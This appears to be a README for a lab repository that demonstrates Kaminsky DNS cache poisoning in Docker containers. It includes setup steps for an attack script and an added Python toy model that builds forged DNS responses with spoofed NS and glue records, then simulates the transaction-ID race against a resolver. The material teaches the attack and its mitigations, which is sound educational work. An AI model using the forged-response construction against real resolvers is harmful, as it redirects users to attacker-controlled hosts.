This repository demonstrates the Kaminsky attack, a DNS cache poisoning technique that lets a remote attacker inject forged records into the cache of a vulnerable recursive DNS server, so that clients relying on that server are redirected to attacker-controlled IP addresses.
Three entities take part in the attack:
- Alice (10.0.0.2): the unsuspecting client who resolves names through the poisoned DNS server
- Mallory (10.0.0.3): the remote attacker who poisons the DNS server's cache
- Server (10.0.0.4): the vulnerable recursive DNS server
To build and run the project:
- Build the images:
    docker-compose build
- Create and start the containers:
    docker-compose up
- Open a shell in Mallory's container (use a second terminal, since docker-compose up stays in the foreground):
    docker exec -it mallory bash
- Run the attack script:
    python3 /shared/mallory/attack.py
- Let the attack run for a while, then restart the Mallory container.
- When Alice now queries sec-commerce.seclab.space, she gets Mallory's IP instead of the real one.
Essentially, attack.py starts 10 processes. Each one sends the DNS server a query for a fake (random, non-existent) hostname under the target domain, which forces the server to start a recursive lookup, and then fires 50 forged response packets every few milliseconds, each carrying a guessed 16-bit transaction ID. The server accepts whichever reply first matches the transaction ID (and its fixed source port), so the forged responses only have to beat the genuine one in a race. Because every new random hostname starts a fresh race, the attacker gets an unlimited number of attempts; in the Kaminsky variant the forged reply's authority and glue records re-point the whole domain rather than just the random name, so once one forged packet is accepted and cached, Alice's lookup of sec-commerce.seclab.space is answered with Mallory's spoofed address.
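The race above, as an added toy model (this is not the repository's attack.py and does not send real traffic). It builds the forged response on the wire format that a real spoofer would send, and pairs it with a minimal resolver that validates replies by transaction ID and destination port only, then caches records that lie inside the bailiwick of the query. The zone and Mallory's address come from this README; the in-bailiwick NS name ns.sec-commerce.seclab.space, the port range, and the "parent of the queried name" bailiwick rule are assumptions of the model.

```python
"""Toy model of the Kaminsky race (added example, not the repo's attack.py)."""
import random
import struct

ZONE = "sec-commerce.seclab.space."     # target zone, from the README
MALLORY_IP = "10.0.0.3"                  # Mallory, from the README
FAKE_NS = "ns." + ZONE                   # assumed in-bailiwick NS name


def encode_name(name):
    """DNS wire-format name, uncompressed (no 0xC0 pointers)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(lab)]) + lab.encode() for lab in labels) + b"\x00"


def decode_name(buf, off):
    labels = []
    while buf[off]:
        n = buf[off]
        labels.append(buf[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(labels) + ".", off + 1


def rr(name, rtype, rdata, ttl=86400):
    """Resource record: NAME TYPE CLASS=IN TTL RDLENGTH RDATA."""
    return encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


def forge_response(txid, qname, zone, ns_name, ns_ip):
    """Kaminsky payload: no answer for qname, but an NS record for `zone` in the
    authority section plus a glue A record that sends that NS to ns_ip."""
    hdr = struct.pack("!HHHHHH", txid, 0x8400, 1, 0, 1, 1)  # QR=1 AA=1; 1 NS, 1 glue
    question = encode_name(qname) + struct.pack("!HH", 1, 1)  # QTYPE A, QCLASS IN
    glue_ip = bytes(int(o) for o in ns_ip.split("."))
    return hdr + question + rr(zone, 2, encode_name(ns_name)) + rr(ns_name, 1, glue_ip)


class ToyResolver:
    def __init__(self, randomize_port=False):
        self.randomize_port = randomize_port
        self.pending = {}   # qname -> (txid, source port, bailiwick)
        self.cache = {}     # (name, rtype) -> rdata

    def send_query(self, qname):
        txid = random.randrange(1 << 16)
        port = random.randrange(1024, 1 << 16) if self.randomize_port else 53
        bailiwick = qname.split(".", 1)[1]   # simplification: parent of qname
        self.pending[qname] = (txid, port, bailiwick)
        return txid, port

    def receive(self, dst_port, pkt):
        """Accept iff TXID and port match the pending query; cache in-bailiwick RRs."""
        txid, _, _, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
        qname, off = decode_name(pkt, 12)
        off += 4                             # skip QTYPE/QCLASS
        entry = self.pending.get(qname)
        if entry is None or entry[:2] != (txid, dst_port):
            return False                     # wrong TXID or port: silently dropped
        del self.pending[qname]              # first matching reply wins the race
        for _ in range(an + ns + ar):
            name, off = decode_name(pkt, off)
            rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
            rdata = pkt[off + 10:off + 10 + rdlen]
            off += 10 + rdlen
            if name.endswith(entry[2]):      # bailiwick check
                self.cache[(name, rtype)] = rdata
        return True

    def next_hop_for(self, zone):
        """Where the resolver now sends queries for `zone`: its cached NS glue."""
        ns_name, _ = decode_name(self.cache[(zone, 2)], 0)
        return ".".join(str(b) for b in self.cache[(ns_name, 1)])


def attack(resolver, guesses_per_query, max_queries, spray_ports=False):
    """Mallory's loop: ask for a fresh random hostname, then flood forged replies
    with guessed TXIDs. Returns the number of queries needed, or None."""
    for i in range(1, max_queries + 1):
        qname = f"x{random.randrange(1 << 32)}.{ZONE}"
        resolver.send_query(qname)
        for txid in random.sample(range(1 << 16), guesses_per_query):  # no repeats
            port = random.randrange(1024, 1 << 16) if spray_ports else 53
            if resolver.receive(port, forge_response(txid, qname, ZONE, FAKE_NS, MALLORY_IP)):
                return i
        resolver.pending.pop(qname, None)    # genuine reply arrived: this race is lost
    return None


if __name__ == "__main__":
    r = ToyResolver()
    print("queries needed:", attack(r, 50, 5000), "next hop:", r.next_hop_for(ZONE))
```

With a fixed source port each forged packet matches with probability 1/65536, so 50 packets per query give roughly a 0.08% chance per race and the script depends on running many races; with source-port randomization the attacker must also guess the port, which multiplies the search space by about 64k and is why port randomization was the mitigation deployed in 2008. The model also shows the check that bounds the damage: an authority record for seclab.space. in a reply about a sec-commerce.seclab.space. name is outside the bailiwick and is never cached.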